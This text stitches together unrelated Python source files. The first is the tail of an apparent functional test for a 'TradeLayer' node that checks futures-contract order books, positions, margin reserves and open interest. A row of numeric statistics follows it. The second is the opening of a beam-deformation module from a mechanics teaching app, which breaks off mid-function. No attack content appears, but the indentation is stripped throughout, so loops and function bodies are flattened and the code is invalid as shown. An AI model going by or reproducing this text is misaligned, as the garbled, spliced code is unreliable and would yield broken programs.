params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_cancelallcontractsbyaddress",params)
# self.log.info(out)
assert_equal(out['error'], None)
params = str([addresses[1], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_cancelallcontractsbyaddress",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'100.00000000')
self.log.info("Checking orderbook (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'],[])
self.log.info("Checking orderbook (sell side)")
params = str(["ALL/Lhk", 2]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'],[])
self.log.info("Sending a new buy order")
params = str([addresses[1], "ALL/Lhk", "1000", "100.9", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
hash = str(out['result']).replace("'","")
self.nodes[0].generate(1)
self.log.info("Checking orderbook (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[1])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '100.90000000')
assert_equal(out['result'][0]['block'], 213)
assert_equal(out['result'][0]['idx'], 1)
idx = out['result'][0]['idx']
block = out['result'][0]['block']
self.log.info("Canceling using tl_cancelorderbyblock")
params = str([addresses[1], block, idx]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_cancelorderbyblock",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'],[])
self.log.info("Checking the partial fill")
self.log.info("Sending buy order")
params = str([addresses[0], "ALL/Lhk", "1000", "800.1", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'200.01000000')
self.log.info("Checking orderbook (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[0])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '800.10000000')
assert_equal(out['result'][0]['block'], 215)
assert_equal(out['result'][0]['idx'], 1)
self.log.info("Sending sell order")
params = str([addresses[1], "ALL/Lhk", "500", "800.1", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking position in addresses")
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], -500)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'200.01000000')
params = str([addresses[1], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], 500)
self.log.info("Checking the open interest")
params = str(["ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getopen_interest",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['totalLives'], 500)
self.log.info("Checking orderbook again (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[0])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 500)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '800.10000000')
assert_equal(out['result'][0]['block'], 215)
assert_equal(out['result'][0]['idx'], 1)
self.log.info("Putting order without collateral")
self.log.info("Sending sell order")
params = str([addresses[2], "ALL/Lhk", "300", "800.1", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error']['message'], 'Sender has insufficient balance for collateral')
self.log.info("Sending sell order with more than max leverage")
params = str([addresses[1], "ALL/Lhk", "500", "800.1", 2, "1000"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error']['message'], 'Leverage out of range')
self.log.info("Checking trading against yourself")
self.log.info("Sending buy sell")
params = str([addresses[0], "ALL/Lhk", "500", "800.1", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_tradecontract",params)
# self.log.info(out)
# assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook again (sell side)")
params = str(["ALL/Lhk", 2]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[0])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 500)
assert_equal(out['result'][0]['tradingaction'], 2)
assert_equal(out['result'][0]['effectiveprice'], '800.10000000')
assert_equal(out['result'][0]['block'], 217)
assert_equal(out['result'][0]['idx'], 1)
self.log.info("Cancel orders using tl_cancelallcontractsbyaddress")
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_cancelallcontractsbyaddress",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'100.00000000')
self.log.info("Checking orderbook again (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'], [])
self.log.info("Checking orderbook again (sell side)")
params = str(["ALL/Lhk", 2]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'], [])
self.log.info("Closing positions")
self.log.info("Preparing the orderbook")
params = str([addresses[1], "ALL/Lhk", "500", "500.1", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], -500)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'100.00000000')
params = str([addresses[0], 5]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_closeposition",params)
# self.log.info(out)
# assert_equal(out['error'], None)
self.nodes[0].generate(1)
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], 0)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'0.00000000')
self.log.info("Checking margins for short and long position")
params = str([addresses[0], "ALL/Lhk", "500", "500.1", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
params = str([addresses[1], "ALL/Lhk", "500", "500.1", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], 500)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'50.00500000')
params = str([addresses[1], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], -500)
params = str([addresses[2], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], 0)
self.log.info("Checking the open interest")
params = str(["ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getopen_interest",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['totalLives'], 500)
self.log.info("Sending 2000 tokens to third address")
params = str([addresses[0], addresses[2], 4, "2000"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_send",params)
assert_equal(out['error'], None)
# self.log.info(out)
self.nodes[0].generate(1)
params = str([addresses[2], "ALL/Lhk", "1000", "400.1", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("First address from long to short position")
params = str([addresses[0], "ALL/Lhk", "1000", "400.1", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], -500)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'150.00500000')
params = str([addresses[2], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], 1000)
self.log.info("Checking the open interest")
params = str(["ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getopen_interest",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['totalLives'], 1000)
self.log.info("Checking orderbook again (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'], [])
self.log.info("Checking orderbook again (sell side)")
params = str(["ALL/Lhk", 2]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'], [])
self.log.info("Testing order stack (different blocks)")
for i in range(5):
params = str([addresses[0], "ALL/Lhk", "1000", "100.2", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook again (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[0])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '100.20000000')
assert_equal(out['result'][0]['block'], 226)
assert_equal(out['result'][0]['idx'], 1)
assert_equal(out['result'][1]['address'], addresses[0])
assert_equal(out['result'][1]['contractid'], 5)
assert_equal(out['result'][1]['amountforsale'], 1000)
assert_equal(out['result'][1]['tradingaction'], 1)
assert_equal(out['result'][1]['effectiveprice'], '100.20000000')
assert_equal(out['result'][1]['block'], 227)
assert_equal(out['result'][1]['idx'], 1)
assert_equal(out['result'][2]['address'], addresses[0])
assert_equal(out['result'][2]['contractid'], 5)
assert_equal(out['result'][2]['amountforsale'], 1000)
assert_equal(out['result'][2]['tradingaction'], 1)
assert_equal(out['result'][2]['effectiveprice'], '100.20000000')
assert_equal(out['result'][2]['block'], 228)
assert_equal(out['result'][2]['idx'], 1)
assert_equal(out['result'][3]['address'], addresses[0])
assert_equal(out['result'][3]['contractid'], 5)
assert_equal(out['result'][3]['amountforsale'], 1000)
assert_equal(out['result'][3]['tradingaction'], 1)
assert_equal(out['result'][3]['effectiveprice'], '100.20000000')
assert_equal(out['result'][3]['block'], 229)
assert_equal(out['result'][3]['idx'], 1)
assert_equal(out['result'][4]['address'], addresses[0])
assert_equal(out['result'][4]['contractid'], 5)
assert_equal(out['result'][4]['amountforsale'], 1000)
assert_equal(out['result'][4]['tradingaction'], 1)
assert_equal(out['result'][4]['effectiveprice'], '100.20000000')
assert_equal(out['result'][4]['block'], 230)
assert_equal(out['result'][4]['idx'], 1)
params = str([addresses[1], "ALL/Lhk", "1000", "100.2", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking the open interest")
params = str(["ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getopen_interest",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['totalLives'], 1500)
self.log.info("Checking orderbook again (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'][0]['address'], addresses[0])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '100.20000000')
assert_equal(out['result'][0]['block'], 227)
assert_equal(out['result'][0]['idx'], 1)
assert_equal(out['result'][1]['address'], addresses[0])
assert_equal(out['result'][1]['contractid'], 5)
assert_equal(out['result'][1]['amountforsale'], 1000)
assert_equal(out['result'][1]['tradingaction'], 1)
assert_equal(out['result'][1]['effectiveprice'], '100.20000000')
assert_equal(out['result'][1]['block'], 228)
assert_equal(out['result'][1]['idx'], 1)
assert_equal(out['result'][2]['address'], addresses[0])
assert_equal(out['result'][2]['contractid'], 5)
assert_equal(out['result'][2]['amountforsale'], 1000)
assert_equal(out['result'][2]['tradingaction'], 1)
assert_equal(out['result'][2]['effectiveprice'], '100.20000000')
assert_equal(out['result'][2]['block'], 229)
assert_equal(out['result'][2]['idx'], 1)
assert_equal(out['result'][3]['address'], addresses[0])
assert_equal(out['result'][3]['contractid'], 5)
assert_equal(out['result'][3]['amountforsale'], 1000)
assert_equal(out['result'][3]['tradingaction'], 1)
assert_equal(out['result'][3]['effectiveprice'], '100.20000000')
assert_equal(out['result'][3]['block'], 230)
assert_equal(out['result'][3]['idx'], 1)
self.log.info("Cleaning orderbook")
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_cancelallcontractsbyaddress",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook again")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'], [])
self.log.info("Testing order stack (different idx)")
for i in range(5):
params = str([addresses[0], "ALL/Lhk", "1000", "200.3", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook again (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[0])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '200.30000000')
assert_equal(out['result'][0]['block'], 233)
assert_equal(out['result'][0]['idx'], 1)
assert_equal(out['result'][1]['address'], addresses[0])
assert_equal(out['result'][1]['contractid'], 5)
assert_equal(out['result'][1]['amountforsale'], 1000)
assert_equal(out['result'][1]['tradingaction'], 1)
assert_equal(out['result'][1]['effectiveprice'], '200.30000000')
assert_equal(out['result'][1]['block'], 233)
assert_equal(out['result'][1]['idx'], 2)
assert_equal(out['result'][2]['address'], addresses[0])
assert_equal(out['result'][2]['contractid'], 5)
assert_equal(out['result'][2]['amountforsale'], 1000)
assert_equal(out['result'][2]['tradingaction'], 1)
assert_equal(out['result'][2]['effectiveprice'], '200.30000000')
assert_equal(out['result'][2]['block'], 233)
assert_equal(out['result'][2]['idx'], 3)
assert_equal(out['result'][3]['address'], addresses[0])
assert_equal(out['result'][3]['contractid'], 5)
assert_equal(out['result'][3]['amountforsale'], 1000)
assert_equal(out['result'][3]['tradingaction'], 1)
assert_equal(out['result'][3]['effectiveprice'], '200.30000000')
assert_equal(out['result'][3]['block'], 233)
assert_equal(out['result'][3]['idx'], 4)
assert_equal(out['result'][4]['address'], addresses[0])
assert_equal(out['result'][4]['contractid'], 5)
assert_equal(out['result'][4]['amountforsale'], 1000)
assert_equal(out['result'][4]['tradingaction'], 1)
assert_equal(out['result'][4]['effectiveprice'], '200.30000000')
assert_equal(out['result'][4]['block'], 233)
assert_equal(out['result'][4]['idx'], 5)
params = str([addresses[1], "ALL/Lhk", "1000", "200.3", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook again (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'][0]['address'], addresses[0])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '200.30000000')
assert_equal(out['result'][0]['block'], 233)
assert_equal(out['result'][0]['idx'], 2)
assert_equal(out['result'][1]['address'], addresses[0])
assert_equal(out['result'][1]['contractid'], 5)
assert_equal(out['result'][1]['amountforsale'], 1000)
assert_equal(out['result'][1]['tradingaction'], 1)
assert_equal(out['result'][1]['effectiveprice'], '200.30000000')
assert_equal(out['result'][1]['block'], 233)
assert_equal(out['result'][1]['idx'], 3)
assert_equal(out['result'][2]['address'], addresses[0])
assert_equal(out['result'][2]['contractid'], 5)
assert_equal(out['result'][2]['amountforsale'], 1000)
assert_equal(out['result'][2]['tradingaction'], 1)
assert_equal(out['result'][2]['effectiveprice'], '200.30000000')
assert_equal(out['result'][2]['block'], 233)
assert_equal(out['result'][2]['idx'], 4)
assert_equal(out['result'][3]['address'], addresses[0])
assert_equal(out['result'][3]['contractid'], 5)
assert_equal(out['result'][3]['amountforsale'], 1000)
assert_equal(out['result'][3]['tradingaction'], 1)
assert_equal(out['result'][3]['effectiveprice'], '200.30000000')
assert_equal(out['result'][3]['block'], 233)
assert_equal(out['result'][3]['idx'], 5)
self.log.info("Cleaning orderbook")
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_cancelallcontractsbyaddress",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook again")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'], [])
self.log.info("Testing trades after contract deadline")
for i in range(5):
self.nodes[0].generate(200)
params = str([addresses[0], "ALL/Lhk", "1000", "200.3", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook empty")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'], [])
self.log.info("Checking all positions")
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], 1500)
params = str([addresses[1], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], -2500)
params = str([addresses[2], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], 1000)
self.log.info("Checking the open interest")
params = str(["ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getopen_interest",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['totalLives'], 2500)
conn.close()
self.stop_nodes()
if __name__ == '__main__':
NativesBasicsTest ().main ()
| 42.730237 | 128 | 0.594871 | 5,223 | 43,243 | 4.814474 | 0.060502 | 0.143045 | 0.1815 | 0.192476 | 0.889644 | 0.86992 | 0.851467 | 0.831265 | 0.821801 | 0.813768 | 0 | 0.045913 | 0.209745 | 43,243 | 1,011 | 129 | 42.772502 | 0.689872 | 0.067063 | 0 | 0.739583 | 0 | 0 | 0.246505 | 0.024663 | 0 | 0 | 0 | 0 | 0.479167 | 1 | 0.004464 | false | 0.002976 | 0.008929 | 0 | 0.014881 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
7383d50506628290ce7d3154dee0f9e1de83fc06 | 8,243 | py | Python | Maxwell_Reciprocity/Maxwell_Functions_Side.py | ChairOfStructuralMechanicsTUM/Mechanics_Apps | b064a42d4df3fa9bde62a5cff9cb27ca61b0127c | [
"MIT"
] | 11 | 2017-05-06T17:05:29.000Z | 2020-11-12T09:26:47.000Z | Maxwell_Reciprocity/Maxwell_Functions_Side.py | ChairOfStructuralMechanicsTUM/Mechanics_Apps | b064a42d4df3fa9bde62a5cff9cb27ca61b0127c | [
"MIT"
] | 49 | 2017-04-20T11:26:11.000Z | 2020-05-29T13:18:06.000Z | Maxwell_Reciprocity/Maxwell_Functions_Side.py | ChairOfStructuralMechanicsTUM/Mechanics_Apps | b064a42d4df3fa9bde62a5cff9cb27ca61b0127c | [
"MIT"
] | 4 | 2017-02-14T12:55:34.000Z | 2022-01-12T15:07:07.000Z | import Maxwell_Constants as glc
################################################################################
### all three side functions
################################################################################
def side1(f,paramInt,i):
'''Calculates deformation of the left hand side (side1).
Obtained from Java code'''
x1 = []
x2 = []
x3 = []
y1 = []
y2 = []
y3 = []
d1 = i / glc.FScale
d7 = 0.8
d8 = 0.1
d2 = 0
d3 = 0
d5 = 0
d4 = 0
d6 = 0
d9 = 0
d12 = 0
d13 = 0
#change arrow:
if (i<0):
# f.arrow_source.data = dict(xS= [0.12-i/glc.arr_scal], xE= [0.12],
#yS= [0.1 + paramInt*(1.0/60)], yE=[0.1+ paramInt*(1.0/60)], lW = [abs(i/glc.arr_scal)] )
f.arrow_source.stream(dict(xS= [0.12-i/glc.arr_scal], xE= [0.12],
yS= [0.1 + paramInt*(1.0/60)], yE=[0.1+ paramInt*(1.0/60)], lW = [abs(i/glc.arr_scal)]),rollover=1)
f.label.data = dict(x = [0.12-i/glc.arr_scal], y = [0.1+ paramInt*(1.0/60)], name = [f.name])
elif i>0:
#f.arrow_source.data = dict(xS= [0.08-i/glc.arr_scal], xE= [0.08],
#yS= [0.1 + paramInt*(1.0/60)], yE=[0.1+ paramInt*(1.0/60)], lW = [abs(i/glc.arr_scal)] )
f.arrow_source.stream(dict(xS= [0.08-i/glc.arr_scal], xE= [0.08],
yS= [0.1 + paramInt*(1.0/60)], yE=[0.1+ paramInt*(1.0/60)], lW = [abs(i/glc.arr_scal)]),rollover=1)
f.label.data = dict(x = [0.08-i/glc.arr_scal], y = [0.1+ paramInt*(1.0/60)], name = [f.name])
else:
f.label.data = dict(x = [0.03-i/glc.arr_scal], y = [0.1+ paramInt*(1.0/60)], name = [f.name])
d2 = (paramInt / 30.0) * glc.a
d3 = glc.a - d2
d5 = (-1/3.0) * d1 * d2 * glc.b
d4 = -d5 + ( (d1 / 2.0) * glc.a * glc.a ) - ( (d1 / 2.0) * d3 * d3)
d6 = d1 * d2 * (glc.b / 2.0) + d5
d9 = glc.a / 4.0
d11 = 0.1
d12 = 0.1
d7 = 0.0
d8 = 0.0
for j in range(1,5):
d13 = j * d9
d8 = d13 + d12
if (d13 < d2):
d7 = (-1.0/6.0) * (d1 * d13 * d13 * d13) + (d4 * d13) + d11
else:
d7 = (-1.0/6.0) * (d1 * d13 * d13 * d13) + (d4 * d13) + (1.0/6.0) * (d1 * ( (d13 - d2)**3 ) ) + d11
x1.append(d7)
y1.append(d8)
d11 = d7
d12 = d8
d9 = glc.b / 4.0
for j in range(0,5):
d13 = j * d9
d7 = d13 + d11
d8 = (0.5 * d1 * d2 * d13 * d13) - ( (1.0/6.0) * d1 * (d2 / glc.b) * (d13**3.0) ) + (d5 * d13) + d12
x2.append(d7)
y2.append(d8)
d11 = d7
d12 = d8
d9 = glc.a/4.0
for j in range(0,5):
d13 = j * d9
d8 = d12 - d13
d7 = d11 + (d6 * d13)
x3.append(d7)
y3.append(d8)
#output:
x = [0.1] + x1 + x2 + x3
y = [0.1] + y1 + y2 + y3
f.pts.data = dict(x = x, y = y ) #updates the frame of object f
def side2(f,paramInt,i):
'''Calculates the deformations of the top of the frame (side 2)'''
x1 = []
x2 = []
x3 = []
y1 = []
y2 = []
y3 = []
#add arrow changing function here
#change arrow:
if i<0:
#f.arrow_source.data = dict(xS= [0.1 + (paramInt-30)*(0.0175)], xE= [0.1 + (paramInt-30)*(0.0175)],
#yS= [0.58+i/glc.arr_scal], yE=[0.58], lW = [abs(i/glc.arr_scal)] )
f.arrow_source.stream(dict(xS= [0.1 + (paramInt-30)*(0.0175)], xE= [0.1 + (paramInt-30)*(0.0175)],
yS= [0.58+i/glc.arr_scal], yE=[0.58], lW = [abs(i/glc.arr_scal)] ),rollover=1)
f.label.data = dict(x = [0.1 + (paramInt-30)*(0.0175)], y = [0.58+i/glc.arr_scal], name = [f.name])
elif i>0:
#f.arrow_source.data = dict(xS= [0.1 + (paramInt-30)*(0.0175)], xE= [0.1 + (paramInt-30)*(0.0175)],
#yS= [0.62+i/glc.arr_scal], yE=[0.62], lW = [abs(i/glc.arr_scal)] )
f.arrow_source.stream(dict(xS= [0.1 + (paramInt-30)*(0.0175)], xE= [0.1 + (paramInt-30)*(0.0175)],
yS= [0.62+i/glc.arr_scal], yE=[0.62], lW = [abs(i/glc.arr_scal)] ),rollover=1)
f.label.data = dict(x = [0.1 + (paramInt-30)*(0.0175)], y = [0.62+i/glc.arr_scal], name = [f.name])
else:
f.label.data = dict(x = [0.1 + (paramInt-30)*(0.0175)], y = [0.62+i/glc.arr_scal], name = [f.name])
d1 = i / glc.FScale
d10 = 0
d14 = 0
d9 = (paramInt - 30) / 40.0 * glc.b
